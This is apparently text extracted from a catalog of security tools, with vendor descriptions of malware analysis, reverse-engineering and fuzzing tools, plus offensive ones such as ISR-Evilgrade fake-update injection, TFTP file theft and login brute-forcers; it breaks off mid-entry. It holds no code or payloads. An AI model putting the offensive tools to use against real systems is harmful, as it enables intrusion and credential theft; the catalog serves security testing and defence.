Sie sind auf Seite 1von 183

http://r3stricted.com/book/export/html/16 Tools Catalog Analysis Artemisa http://sourceforge.

net/projects/artemisa/ Artemisa is an open source VoIP/SIP-specific honeypot software designed to conne ct to a VoIP enterprise domain as a user-agent backend in order to detect malici ous activity at an early stage. Moreover, the honeypot can play a role in the re al-time adjustment of the security policies of the enterprise domain where it is deployed. Artemisa should work as a conventional user-agent of a VoIP/SIP domain. To achie ve this, it provides modular configuration files where the administrator can set up the connection parameters as well as the Artemisa's behavior. The SIP registrar server of the domain should be also configured in order to let Artemisa be registered with a set of extensions (e.g. 5 extensions from 401 to 405). Once Artemisa is configured and launched, which is suggested to do it on a separate machine or virtual machine, it keeps listening and waiting for SIP act ivity. Normally, it's expected NOT to see SIP activity on the honeypot, such as a call, since the honeypot doesn't represent a human being. Thus, any call or me ssage which reach the honeypot is suspicious and is analyzed. The analysis involves the usage of different techniques and third-party tools to determine and classify the nature of the message. When the message is classifie d and a conclusion is obtained, Artemisa reports that in several ways such as ru nning user-configurable scrits and sending an e-mail report. The user-configurab le scripts allow the administrator to give Artemisa the enough power to adjust t he domain policies in real-time. Cuckoo http://www.cuckoobox.org/ Cuckoo is a lightweight solution that performs automated dynamic analysis of pro vided Windows binaries. It is able to return comprehensive reports on key API ca lls and network activity. Current features are: * * * * * * * * Retrieve files from remote URLs and analyze them. Trace relevant API calls for behavioral analysis. Recursively monitor newly spawned processes. Dump generated network traffic. Run concurrent analysis on multiple machines. Support custom analysis package based on AutoIt3 scripting. Intercept downloaded and deleted files. Take screenshots during runtime.

DNS Sinkhole http://isc.sans.edu/diary.html?storyid=9037 A sinkhole is defined like a process in which we redirect specific IP network ta rgeted visitors for a variety of security factors just like analysis, diversion of attacks and detection of anomalous activities. It has extended been deployed by Tier-1 ISPs globally commonly to protect their downstream customers. how ever for ones network administrators, sinkholes are commonly deployed to offer valuab le intelligence relating to the security threats their networks are facing. Read on below for additional facts on sinkholes as well as the a couple of sorts of

sinkhole implementation darknets and honeynets and how you possibly can use them for getting valuable facts relating to threats and misconfigurations within you r network. DOMScan http://blueinfy.com/tools.html DOMScan is utility to drive IE and capture real time DOM from the browser. It gi ves access to active DOM context along with JavaScripts. One can observe the DOM in detail using this utility. It has predefined rules to scan DOM. One can run the scan on existing DOM and fetch interesting entry points and calls. It allows tracing through JavaScript variables as well. Using this utility one can identi fy following vulnerabilities. DOM based XSS DOM based vulnerable calls Source of abuse and external content loading methods Possible DOM logic and business layer calls Same Origin Bypass calls and usage Mashup usage inside DOM Widget Architecture review using the tool

DOMTracer http://blueinfy.com/tools.html DOMTracer - Firefox Plugin (Trace DOM and JavaScript Calls) # The DOM as seen in all the aforementioned cases needs to be analyzed in many a spects. Run-time analysis of the DOM/JavaScript is vital and aids one to look at the calls made during the dynamic DOM manipulation. The DOMTracer is a Firefox Ex tension for this same purpose. It has been written using the standard method of writing extensions using the XUL platform and the JavaScript language in majorit y. This is in beta and we are working on new features. DarunGrim http://www.darungrim.org/ DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provi des binary diffing functionality. Binary diffing is a powerful technique to reverse-engineer patches released by s oftware vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that infor mation to learn what causes software break. Also that information can help you w rite some protection codes for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers. This binary diffing technique is especially useful for Microsoft binaries. Not l ike other vendors they are releasing patch regularly and the patched vulnerabili ties are relatively concentrated in small areas in the code. That makes the patc hed part more visible and apparent to the patch analyzers. There is a "eEye Bina ry Diffing Suites" released back in 2006 and it's widely used by security resear chers to identify vulnerabilities. Even though it's free and opensource, it's po werful enough to be used for that vulnerabilities hunting purpose. Now I'm relea sing DarunGrim2 which is a C++ port of original python codes. DarunGrim2 is way faster than original DarunGrim. Faster Universal Unpacker http://code.google.com/p/fuu/ FUU (Faster Universal Unpacker) is a GUI Windows Tool with a set of tools (plugi

ns) to help you to unpack, decompress and decrypt most of the programs packed, c ompressed or encrypted with the very well knowns software protection programs li ke UPX, ASPack, FSG, ACProtect, etc. The GUI was designed using RadASM and MASM. Every plugin included in the officia l release was written in ASM using MASM. The core of every plugin use TitanEngine SDK from ReversingLabs under the hood, this help to the developer to write plugins very easy and very fast without the need to worry about some repetitive and boring functions like dump, fix the iat, add sections, etc. You can develop a plugin for FUU in a very easy way using Ti tanEngine. Also, FUU include some extra tools like: * * * * Generic OEP Finder Cryto Signature Detector Generic Unpacker Signatures Detector (next release)

FileFormats Origami http://security-labs.org/origami/ origami is a Ruby framework designed to parse, analyze, and forge PDF documents. This is NOT a PDF rendering library. It aims at providing a scripting tool to g enerate and analyze malicious PDF files. As well, it can be used to create on-th e-fly customized PDFs, or to inject (evil) code into already existing documents. Features * Create PDF documents from scratch. * Parse existing documents, modify them and recompile them. * Explore documents at the object level, going deep into the document structure, uncompressing PDF object streams and desobfuscating names and strings. * High-level operations, such as encryption/decryption, signature, file attachme nts... * A GTK interface to quickly browse into the document contents. PDFStreamDumper http://sandsprite.com/blogs/index.php?uid=7&pid=57 PDF Stream Dumper is a free tool that aids in the analysis of malicious PDF docu ments. It also has some features that can make it useful for PDF vulnerability d evelopment. Specialized tools that deal with obfuscated JavaScript code, low lev el PDF header and object reader are available. In terms of shellcode analysis, i t has an integrated interface for libemu sctest, an updated build of iDefense sc log, and a shellcode_2_exe feature. JavaScript tools include integration with JS -Beautifier for code formatting, the ability to run portions of the script live for live de-obfuscation, as well as a pretty stable refactoring engine that will parse a script and replace all the screwy random function and variable names wi th logical sanitized versions for readability are also available. Full feature list * , * o Supported filters: FlateDecode, RunLengthDecode, ASCIIHEXDecode, ASCII85Decode LZWDecode Integrated shellcode tools: sclog gui (Shellcode Analysis tool)

o o o * * * * * * * * * * * * * * * * * * o o o o o o

scdbg libemu based Shellcode analysis tool Shellcode_2_Exe functionality Export unescaped bytes to file Supports filter chaining (ie multiple filters applied to same stream) Supports unescaping encoded pdf headers Scriptable interface to process multiple files and generate reports View all pdf objects View deflated streams View stream details such as file offsets, header, etc Save raw and deflated data Search streams for strings Scan for functions which contain pdf exploits (dumb scan) Format javascript using js beautifier (see credits in readme) View streams as hex dumps Zlib compress/decompress arbitrary files Replace/update pdf streams with your own data Basic JavaScript interface so you can run parts of embedded scripts PdfDecryptor w/source uses iTextSharp and requires .Net Framework 2.0 Basic JavaScript de-obsfuscator Can hide: header only streams, duplicate streams, selected streams JS UI also has access to a toolbox class to simplify fragmented strings read/write files do hexdumps do unicode safe unescapes disassembler engine replicate some common Adobe API (new)

PDF Stream Dumper also supports unescaping/formatting manipulated PDF headers, a s well as being able to decode filter chains (multiple filters applied to the sa me stream object.) via plugins and adds automation features via various VBS scri pts. Current Automation scripts include: * csv_stats.vbs - Builds csv file with results from lower status bar for all fil es in a directory * pdfbox_extract.vbs use pdfbox to extract all images and text from current file * string_scan.vbs scan all decompressed streams in all files in a directory for a string you enter * unsupported_filters.vbs scan a directory and build list of all pdfs which have unsupported filters * filter_chains.vbs recursivly scans parent dir for pdfs that use multiple encod ing filters on a stream. * obsfuscated_headers.vbs recursivly scans parent dir for pdfs that have obsfusc ated object headers * pdfbox_extract_text_page_by_page.vbs uses pdfbox to extract page data into ind ividual files PyOLEScanner https://github.com/Evilcry/PythonScripts PyOLEScanner - Malicious Office File Detection Read http://evilcodecave.blogspot.com/2010/08/malicious-office-files-analysis... for more background info Version 1.3 contains: 1. Bug Fix.

2. 3. 4. 5. 6.

More Shellcode Detection. More API Detection. SQLite Support. OLE2 Macro Scan. Office2007 (docx/pptx/xlsx) deflate and Macro checks.

Directory scan works too, in presence of encryption a 'decrypted' copy. USAGE: python pyOLEScanner.py _suspect_document Compatibility with Windows and Linux is mantained. flasm http://www.nowrap.de/flasm.html Flasm disassembles your entire SWF including all the timelines and events. Looki ng at disassembly, you learn how the Flash compiler works, which improves your A ctionScript skills. You can also do some optimizations on the disassembled code by hand or adjust the code as you wish. Flasm then applies your changes to the o riginal SWF, replacing original actions. It's also possible to embed Flasm actions in your ActionScript, making optimizin g of large projects more comfortable. Flasm is not a decompiler. What you get is the human readable representation of SWF bytecodes, not ActionScript source. If you're looking for a decompiler, Flar e may suit your needs. However, Flare can't alter the SWF. swfmill http://www.swfmill.org/ It's most common use is the generation of asset libraries containing images (PNG and JPEG), fonts (TTF) or other SWF movies for use with MTASC- or haXe-compiled ActionScript, although swfmill can be used to produce both simple and complex S WF structures. * built around an XSLT/EXSLT processor (libxslt) * input and output of the XSLT transformation can be either XML or binary SWF * XSLT commands for importing PNG, JPEG, TTF and SWF, and for mapping SWF ID num bers * built-in "simple dialect" to support library creation and building simple SWFs swfmill was originally written by Daniel Turing, but is now maintained by Daniel Cassidy. It includes substantial contributions by Ralf Fuest, Steve Webster and others. Graudit http://www.justanotherhacker.com/projects/graudit/download.html Graudit is a simple script and signature sets that allows you to find potential security flaws in source code using the GNU utility grep. Its comparable to other static analysis applications like RATS, SWAAT and flaw-finder. Version 1.8 * * * * * -L operator does vim friendly line numbers Man pages and documentation updates PHP signature updates JSP signature updates Dotnet signature updates

* * * * *

Perl signature updates and bug fixes Python signature updates Bug fixes for aux/ scripts More aux/ scripts Fixed ignore CVS directories by default

IEZoneAnalyzer http://blogs.technet.com/b/fdcc/archive/2011/04/14/iezoneanalyzer-v3.aspx IEZoneAnalyzer is a utility for viewing and comparing Internet Explorer security zone settings. It is particularly valuable on systems controlled through Group Policy, on which the standard security settings dialog does not allow viewing of settings. IEZoneAnalyzer version 3 represents a total rewrite, adding a tremend ous amount of new functionality compared to earlier versions. Note that IEZoneAn alyzer does not require administrative rights. It also does not have an installe r just run the utility directly. IEZoneAnalyzer does require.NET Framework 3.5. Key features of IEZoneAnalyzer: * View effective security zone settings for any security zone on the local compu ter or exported from a remote computer and identify whether each setting was est ablished by policy. * Compare settings between two or more security zones or templates. * View and compare entire sets of settings captured on different computers or on a single computer over time (e.g., to determine whether a system has drifted fr om its baseline settings). * Export results to Excel or to a Comma Separated Values (CSV) text file. * Filter comparison results to show only differences or conflicts. * Sort, reorder and resize result columns. * Copy selected or all results to the clipboard. INetSim http://www.inetsim.org/index.html The aim of the INetSim project is to perform a quick run-time analysis of the ne twork behavior of unknown malware samples in a laboratory environment. Modules for the simulation of the following services are included: * * * * * * * * * * * * HTTP / HTTPS SMTP / SMTPS POP3 / POP3S DNS FTP / FTPS TFTP IRC NTP Ident Finger Syslog Dummy.

Immunity Debugger http://www.immunityinc.com/products-immdbg.shtml Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry's first heap analysis tool built specifically for heap c reation, and a large and well supported Python API for easy extensibility.

-A debugger with functionality designed specifically for the security industry -Cuts exploit development time by 50% -Simple, understandable interfaces -Robust and powerful scripting language for automating intelligent debugging -Lightweight and fast debugging to prevent corruption during complex analysis -Connectivity to fuzzers and exploit development tools Mallory http://intrepidusgroup.com/insight/mallory/ Mallory is a transparent TCP and UDP proxy. It can be used to get at those hard to intercept network streams, assess those tricky mobile web applications, or ma ybe just pull a prank on your friend. In more technical terms, Mallory is an extensible TCP/UDP man in the middle prox y that is designed to be run as a gateway. The goal is to man in the middle traffic for testing purposes. The ideal setup f or Mallory is to have a LAN or Victim network that Mallory acts as the gateway for. This can be configured within a virtal machine environment using host only netwo rk interfaces. The victim virtual machines then configures the Mallory machine a s the gateway by manually setting its gateway. The gateway machine will have at least one WAN interface that grants Internet access. The victim network then use s the Mallory gateway to route traffic. Folder Structure * * * * * * ca certificate authority files including Mallorys private key certs MiTM certs that are created on the fly db directory where mallory stores all database files mallory empty directory src where the code lives scripts scripts used to configure mallory enviorment

MiniFuzz File Fuzzer http://www.microsoft.com/downloads/en/details.aspx?FamilyID=B2307CA4-638F-4641-9 946-DC0A5ABE8513&%3bdisplaylang=en&pf=true MiniFuzz is a basic testing tool designed to help detect code flaws that may exp ose security vulnerabilities in file-handling code. This tool creates multiple r andom variations of file content and feeds it to the application to exercise the code in an attempt to expose unexpected and potentially insecure application be haviors. NetworkScanViewer http://www.woany.co.uk/networkscanviewer/ NetworkScanViewer is a GUI application designed to help view the results of ness us (v4) and nmap (v5) scan results. It combines the functionality of both Nessus Viewer and NmapViewer. The application loads the scan data from nessus and nmap XML, does some data cle ansing, then displays the results on the results list. The list data can be sort ed by clicking on the column headers, so it is easy to order and locate particul ar information. There is also the ability to filter on specific information like host, port, service etc so it is easy to drill down to specific information. The export functionality exports using the data shown in the results list, so if you change the sort order or filter the results, then it is reflected in the ex port. It is also possible to permanently exclude scripts that just generate nois

e by right clicking on the item and selecting "Ignore Plugin" from the context m enu. Excluded scripts can be re-added at any time by using the Options window. Features * * * * * Data cleansing Export to CSV and XML Sortable data columns Data Filtering Script excluding

ProcNetMonitor http://securityxploded.com/procnetmonitor.php ProcNetMonitor is the free tool to monitor the network activity of all running p rocess in the system. It displays all open network ports (TCP/UDP) and active ne twork connections for each process. It has advanced color based auto analysis sy stem to make it easy to distinguish network oriented processes from others with just one glance at the list. It also presents unique 'Port Finder' feature to easily search for particular po rt in all running processes with just one click. It also comes with export featu re to save the entire process-port list to standard HTML file for offline analys is. SQLInject Finder http://code.google.com/p/sqlinject-finder/ Brief Description Simple python script that parses through a pcap and looks at the GET and POST re quest data for suspicious and possible SQL injects. Rules to check for SQL injec tion can be easily added. Output can be printed neatly on the command line or in tab delimited format. The output includes: * The suspicious IP address * The attacked webpage * The parameter and value used * The frame number of the packet within the pcap (can be used to find exactly wh ere the packet is in Wireshark) * The reason why the request was flagged TitanEngine http://www.reversinglabs.com/products/TitanEngine.php With time, malware authors are becoming cleverer and are successfully finding wa ys of evading security software. The only thing standing between a clean machine a nd malware is a reverse engineer/malware analyser. As malwares get equiped with newer techniques, it is becoming imperative for reverse engineers to test for ma lwares in the time made available to them. Tools like TitanEngine will surely he lp us in our malware analysis & reverse engineering endeavours! It is one of the tools that we have been waiting for download since the time it was announced at the BlackHat 09! TitanEngine is a an OPEN SOURCE framework from the Reversing Labs that can be us ed to perform over 250 functions! Best of all, you can have all of that automate d. It can also be used to make new tools that work with PE files! Both 32 bit & 64 bit formats are supported! It can be used to create all known types of unpack

ers. Its features are: * * * * * * * * * * * * * SDK has 250 documented functions Easy automation of all reversing tools Supports both x86 and x64 Can create: Static, Dynamic & Generic unpackers Tested on over 150 unpackers Its free and open sourceLGPL3! Integrated x86/x64 debugger Integrated x86/x64 disassembler Integrated memory dumper Integrated import tracer & fixer Integrated relocation fixer Integrated file realigner Functions to work with TLS, Resources, Exports,

Tuluka kernel inspector http://www.tuluka.org/index.html uluka is a new powerful tool (antirootkit), which has the following features: * Detects hidden processes, drivers and devices * Detects IRP hooks * Identifies the substitution of certain fields in DRIVER_OBJECT structure * Checks driver signatures * Detects and restores SSDT hooks * Detects suspicious descriptors in GDT * IDT hook detection * SYSENTER hook detection * Displays list of system threads and allows you to suspend them * IAT and Inline hook detection * Shows the actual values of the debug registers, even if reading these register s is controlled by someone * Allows you to find the system module by the address within this module * Allows you to display contents of kernel memory and save it to disk * Allows you to dump kernel drivers and main modules of all processes * Allows you to terminate any process * Is able to dissasemble interrupt and IRP handlers, system services, start rout ines of system threads and many more * Allows to build the stack for selected device * Much more.. Displays the above stated information in GUI for user to see and probably make u se of those information for analysis Vera http://www.offensivecomputing.net/?q=node/1316 VERA, the reverse engineering visualization program based off the Ether Project. Reverse Engineering by Crayon Slides from the Blackhat talk. http://www.offensivecomputing.net/bhusa2009/oc-reversing-by-crayon-bhusa... Ether: Malware Analysis via Hardware Virtualization Extensions http://ether.gtisc.gatech.edu/ http://www.offensivecomputing.net/?q=node/1379 WinAPIOverride32

http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride32 is an open source and advanced api monitoring software for Wind ows operating systems. You can use it to monitor and/or override any function of a process! You can do it for API functions or executable internal functions. Th is can be specially helpful when you are dealing with malwares or trying to reve rse engineer certain applications. A few of WinAPIOverride32s functions are: * You can define filters on parameters or function result * You can define filters on dll to discard calls from windows system dll * You can hook functions inside the target process not only API * You can hook asm functions with parameters passed through registers * You can hook hardware and software exceptions * Double and float results are logged * You can easily override any API or any process internal function * You can break process before or/and after function call to change memory or re gisters * You can call functions which are inside the remote processes * Can hook COM OLE and ActiveX interfaces * User types (enum, struct and union) and user defines are supported * All is is done like modules : you can log or override independently for any fu nction * Open Source * A library is provided for developpers who intend to build their one hooking so ftware WinAPIOverride32 tries to fill the gap between classical API monitoring software s and debuggers. You can also break a targeted application before or after a funct ion call, allowing memory or registers changes; and it can directly call functio ns of the targeted application. This is a wonderful open source application, wri tten in C++. Windows System State Analyzer http://go.microsoft.com/fwlink/?LinkID=140110 http://go.microsoft.com/fwlink/?Li nkID=140109 The basic functionality of the System State Analyzer tool is to allow you to com pare two snapshots taken at different points in time. This allows you to compare the state of a machine both before and after an application install or probably you could use it in your VM as a first step in malware analysis or reverse engi neering This tool is a part of the Windows 2008 R2 Logo Software Certification and Windo ws 2008 R2 Logo Program Software Certification toolkits. Hence you will need to download the toolkits to get the System State Analyzer tool. Yara http://code.google.com/p/yara-project/ YARA is a tool aimed at helping malware researchers to identify and classify mal ware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each descrip tion consists of a set of strings and a Boolean expression which determines its logic bitblaze http://bitblaze.cs.berkeley.edu/ Binary analysis is imperative for protecting COTS (common off-the-shelf) program

s and analyzing and defending against the myriad of malicious code, where source code is unavailable, and the binary may even be obfuscated. Also, binary analys is provides the ground truth about program behavior since computers execute bina ries (executables), not source code. However, binary analysis is challenging due to the lack of higher-level semantics. Many higher level techniques are often i nadequate for analyzing even benign binaries, let alone potentially malicious bi naries. Thus, we need to develop tools and techniques which work at the binary l evel, can be used for analyzing COTS software, as well as malicious binaries. The BitBlaze project aims to design and develop a powerful binary analysis platf orm and employ the platform in order to (1) analyze and develop novel COTS prote ction and diagnostic mechanisms and (2) analyze, understand, and develop defense s against malicious code. The BitBlaze project also strives to open new applicat ion areas of binary analysis, which provides sound and effective solutions to ap plications beyond software security and malicious code defense, such as protocol reverse engineering and fingerprint generation. cross_fuzz http://lcamtuf.coredump.cx/cross_fuzz http://lcamtuf.blogspot.com/2011/01/announcing-crossfuzz-potential-0-day... The fuzzer owes much of its efficiency to dynamically generating extremely longwinding sequences of DOM operations across multiple documents, inspecting return ed objects, recursing into them, and creating circular node references that stre ss-test garbage collection mechanisms. Detailed cross_fuzz fuzzing algorithm: 1. Open two windows with documents of any (DOM-enabled) type. Simple HTML, XHTML , and SVG documents are randomly selected as targets by default - although any o ther, possibly plugin-supported formats could be targeted instead. 2. Crawl DOM hierarchy of the first document, collecting encountered object refe rences for later reuse. Visited objects and collected references are tagged usin g an injected property to avoid infinite recursion; a secondary blacklist is use d to prevent navigating away or descending into the master window. Critically, r andom shuffling and recursion fanout control are used to ensure good coverage. 3. Repeat DOM crawl, randomly tweaking encountered object properties by setting them to a one of the previously recorded references (or, with some probability, to one of a handful of hardcoded "interesting" values). 4. Repeat DOM crawl, randomly calling encountered object methods. Call parameter s are synthesized using collected references and "interesting" values, as noted above. If a method returns an object, its output is subsequently crawled and twe aked in a similar manner. 5. Randomly destroy first document using one of the several possible methods, to ggle garbage collection. 6. Perform the same set of crawl & tweak operations for the second document, but use references collected from the first document for overwriting properties and calling methods in the second one. 7. Randomly destroy document windows, carry over a percentage of collected refer ences to the next fuzzing cycle. dirtyJOE

http://dirty-joe.com/ dirtyJOE - Java Overall Editor is a complex editor and viewer for compiled java binaries (.class files). Current version still has some limitations, but hopeful ly those will be removed within the next releases. dirtyJOE is free for non-commercial use. dirtyJOE is entirely written in C++, no third party libraries were used. Main features: * Viewer for: constant pool, methods, fields, attributes * Editor for: constant pool, bytecode, file header fl0p http://lcamtuf.coredump.cx/fl0p-devel.tgz This tool was released way back in the year 2006 by Mr. Michal Zalewski. It is p opularly believed that secure protocols such as SSH, HTTPS, FTPS, etc. are compl etely safe from monitoring. But, fl0p will prove you wrong. fl0p is a simple flow-analyzing passive L7 fingerprinter. It passively examines the sequence of client-server exchanges inside your network with their their rel ative layer 7 payload sizes and transmission intervals. The result is then match ed with a database of traffic pattern signatures to deduce its observations. It does so, not by sniffing, but just by matching the result. This is why having a good database is important.The database can be found in the fl0p.fp file. You su re can add and improve upon the database with your inputs. From the output that the tool displays, you can decipher the IP addresses of the two hosts taking part in the communication. In case of HTTPS traffic, you can a lso possibly check for the site that the client has requested for. It has been loosely based on another wonderful tool p0f and has been coded in C. This being the reason, it is supported on many systems Linux, *BSD, MacOS X, AI X, and Cygwin. This can be an interesting if you have lots of time to pre-plan your attack. You can go on looking at the output and learn about the network. javasnoop http://code.google.com/p/javasnoop/ JavaSnoop is a tool that lets you intercept methods, alter data and otherwise te st the security of Java applications on your desktop. It does so, by allowing yo u to attach it to an existing process (like a debugger) and instantly begin tamp ering with method calls, run custom code, or just watch whats happening on the sy stem. How does it attach to an existing process? It installs stageloading hooks wi th the Java Instrumentation API and by working with some bytecodes. http://www.aspectsecurity.com/tools/javasnoop/ malwareanalyzer http://code.google.com/p/malwareanalyzer/ It can be useful for string based analysis for Windows registry, API calls, IRC Commands, DLLs called and anit-VMWare code detection. It displays detailed header s of PE with all its section details, import and export symbols etc. It can also perform an full ASCII dump of the PE along with other options. It can also gene rate various section of a PE, like the DOS Header, DOS Stub, PE File Header, Ima

ge Optional Header, Section Table, Data Directories, Sections, etc. Malware anal yzer will also help you with code analysis and disassembling the malware. It can also perform an online malware check at www.virustotal.com. Based on PeID signa tures, it can also detect packers used to compress the file. It also provides a tracer functionality that can be used to identify anti-debugging calls tricks, f ile system manipulation calls, rootkit hooks, keyboard hooks, DEP setting change s, etc. minibis http://cert.at/downloads/software/minibis_en.html Build up a customizable automated malware analysis station by using only freely available components with the exception of the target OS (Windows XP) itself. Fu rther a special focus lies in handling a huge amount of malware samples and the actual implementation at CERT.at. As primary goal the reader of this paper shoul d be able to build up her own specific installation and configuration while bein g free in her decision which components to use. pyREtic http://code.google.com/p/pyretic/ pyREtic and the REpdb debugger allow easier access to obtaining source from clos ed source Python applications. In a nutshell it allows you to take a object in memory back to source code, with out needing access to the bytecode directly on disk. This can be useful if the a pplictions pyc's on disk are obfuscated in one of many ways. Presentation from blackhat here: http://prezi.com/kmyvgiobsl1d/pyretic-rich-smit h-blackhatdefcon-2010/ streamarmor http://www.rootkitanalytics.com/tools/streamarmor.php StreamArmor is the sophisticated tool for discovering hidden alternate data stre ams (ADS) as well as clean them completely from the system. It's advanced auto a nalysis coupled with online threat verification mechanism makes it the best tool available in the market for eradicating the evil streams. StreamArmor comes wit h fast multi threaded ADS scanner which can recursively scan over entire system and quickly uncover all hidden streams. All such discovered streams are represen ted using specific color patten based on threat level which makes it easy for hu man eye to distinguish between suspicious and normal streams. StreamArmor has built-in advanced file type detection mechanism which examines t he content of file to accurately detect the file type of stream. This makes it g reat tool in forensic analysis in uncovering hidden documents/images/audio/video /database/archive files within the alternate data streams. StreamArmor is the st andalone, portable application which does not require any installation. It can b e copied to any place in the system and executed directly. tcpdump http://www.tcpdump.org/ tcpdump is a common computer network debugging tool that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. vusb-analyzer http://vusb-analyzer.sourceforge.net/

The Virtual USB Analyzer is a free and open source tool for visualizing logs of USB packets, from hardware or software USB sniffer tools. As far as we know, it' s the world's first tool to provide a graphical visualization along with raw hex dumps and high-level protocol analysis. The Virtual USB Analyzer is not itself a USB sniffer tool. It is just a user int erface for visualizing logs. It currently supports three log formats, but it's d esigned to be easily extensible. With a couple dozen lines of Python code, you c an add support for your favorite log format. We developed vusb-analyzer at VMware as an efficient way to debug our own USB vi rtualization stack. We wanted a tool that made it easy to see problems at a glan ce, and we wanted a way to solve both correctness and performance bugs. As a res ult, we ended up with what we think is a fairly unique tool. We're excited to ha ve the opportunity now to release this tool as open source software, under the M IT license. http://esec-lab.sogeti.com/dotclear/index.php?post/2011/04/06/Sniffing-U... VMWare offers the possibility to dump any usb traffic at the lowest level to a d ump file. We'll describe here how to activate this feature, and additionally pub lish a script to convert the dump file to the PCAP format, suitable for use with wireshark. Attacking Applications Process Hacker http://processhacker.sourceforge.net/ Process Hacker is a feature-packed tool for manipulating processes and services on your computer. A simple, customizable tree view with highlighting showing you the processes run ning on your computer. # Detailed performance graphs. # A complete list of services and full control over them (start, stop, pause, re sume and delete). # A list of network connections. # Comprehensive information for all processes: full process performance history, thread listing and stacks with dbghelp symbols, token information, module and m apped file information, virtual memory map, environment variables, handles, ... # Full control over all processes, even processes protected by rootkits or secur ity software. Its kernel-mode driver has unique abilities which allows it to ter minate, suspend and resume all processes and threads, including software like Ic eSword, avast! anti-virus, AVG Antivirus, COMODO Internet Security, etc. (just t o name a few). # Find hidden processes and terminate them. Process Hacker detects processes hid den by simple rootkits such as Hacker Defender and FU. # Easy DLL injection and unloading - simply right-click a process and select "In ject DLL" to inject and right-click a module and select "Unload" to unload! # Many more features... Sniff-n-Spit http://www.andlabs.org/tools.html During Penetration testing it can be seen that thick-clients sometimes communica te with a server whose IP address is hardcoded in to it.The HTTP communication b etween such client and server is harder to intercept and test. Sniff-n-Snip is a very useful utility in such scenarios. It sniffs for HTTP packets from the clie

nt to server and forwards them to your favorite proxy (Burp, WebScarab, Paros et c). User Input: The tool expects the following user input: * Number of the listening interface. This number can be found using the "-l" swi tch. * Source IP, Source Port (optional), Destination IP, and Destination Port of the tcp session that is to be sniffed * Target IP and Target Port of the Interceptor Proxy. Typically values will be 1 27.0.0.1, 8080. * The tool can be forced to listen on promiscuous mode with the "-p" switch. Thi s is OFF by default. Requirements: * WinPcap should be installed on the system, the tool requires this library for sniffing packets. TFTP Theft http://code.google.com/p/tftptheft/ TFTP Theft is a tool which allows one to quickly scan/bruteforce a tftp server f or files and download them instantly. thief.py - downloads files based on a pattern or list of files finder.py - looks for tftp servers on a target ip address range TFTPTheft is a collection of two scripts one for downloading files from discover ed targets and the other for discovering the targets. The names of these two Pyt hon scripts are thief.py and finder.py. So, you could consider this pretty compl ete. It is a tool which allows one to quickly scan/bruteforce a TFTP server for files and download them instantly. It can do so, because TFTP, the Trivial FTP p rotocol still suffers from a major drawback no authentication. isr evilgrade http://www.infobyte.com.ar/developments.html It's is a modular framework that allow us to take advantage of poor upgrade impl ementations by injecting fake updates. What you can do is let ISR-Evilgrade know that some one is requesting for an ate, and that is all. The rest will be done by the tool itself. The original l will download an update as if it was downloaded from the main site instead your internal update server! As of now, ISR-Evilgrade supports the following ules: * * * * * * * * * * Freerip 3.30 Jet photo 4.7.2 Teamviewer 5.1.9385 ISOpen 4.5.0 Istat. Gom 2.1.25.5015 Atube catcher 1.0.300 Vidbox 7.5 Ccleaner 2.30.1130 Fcleaner 1.2.9.409 upd too of mod

* Allmynotes 1.26 * Notepad++ 5.8.2 * Java 1.6.0_22 winxp/win7 * aMSN 0.98.3 * Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Qui cktime 7.6.8 1675) * Mirc 7.14 * Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microso ft works) * Dap 9.5.0.3 * Winscp 4.2.9 * AutoIt Script 3.3.6.1 * Clamwin 0.96.0.1 * AppTapp Installer 3.11 (Iphone/Itunes) * getjar (facebook.com) * Google Analytics Javascript injection * Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8 * Winamp 5.581 * TechTracker (cnet) 1.3.1 (Build 55) * Nokiasoftware firmware update 2.4.8es (Windows software) * Nokia firmware v20.2.011 * BSplayer 2.53.1034 * Apt ( < Ubuntu 10.04 LTS) * Ubertwitter 4.6 (0.971) * Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45 * Cpan 1.9402 * VirtualBox (3.2.8 ) * Express talk * Filezilla * Flashget * Miranda * Orbit * Photoscape. * Panda Antirootkit * Skype * Sunbelt * Superantispyware * Trillian <= 5.0.0.26 * Adium 1.3.10 (Sparkle Framework) * VMware Attack vectors: -------------Internal scenary: - Internal DNS access - ARP spoofing - DNS Cache Poisoning - DHCP spoofing External scenary: - Internal DNS access - DNS Cache Poisoning spiderpig http://code.google.com/p/spiderpig-pdffuzzer/ Adobe and others uses javascript in pdfs to enhance standard workflow for exampl e connecting to database ,spell checking,printing n viewing etc..when we open pd f in reader,it executes this javascript code(ya we all know that). so goal of sp

iderpig is to find bugs in pdf reader's javascript engine. spiderpig reads metho ds prototype from an input file and creates pdf file. Most of the pdf fuzzers wh ich are available on internet are file format fuzzers which tries to fuzz the ad obe's file format implementation.I didnt find one fuzzer which fuzzes adobe's ja vascript imeplementaiton,so here we have spiderpig a javascript fuzzer for pdf f ile format which tries to screw up pdf reader using javascript methods. Credentials Bruter http://sourceforge.net/projects/worawita/ Bruter is a parallel network login brute-forcer on Win32. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of Bruter i s to support a variety of services that allow remote authentication. Cain & Abel http://www.oxid.it/cain.html Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allo ws easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, rec ording VoIP conversations, decoding scrambled passwords, recovering wireless net work keys, revealing password boxes, uncovering cached passwords and analyzing r outing protocol. KrbGuess http://www.cqure.net/wp/krbguess/ KrbGuess is a small and simple tool which can be used during security testing to guess valid usernames against a Kerberos environment. It allows you to do this by studying the response from a TGT request to the KDC server. The tool works ag ainst both Microsoft Active Directory, MIT and Heimdal Kerberos implementations. In addition it will detect if an account lacks pre-authentication. Medusa Parallel Network Login Auditor http://www.foofus.net/jmk/medusa/medusa.html Medusa is intended to be a speedy, massively parallel, modular, login brute-forc er. The goal is to 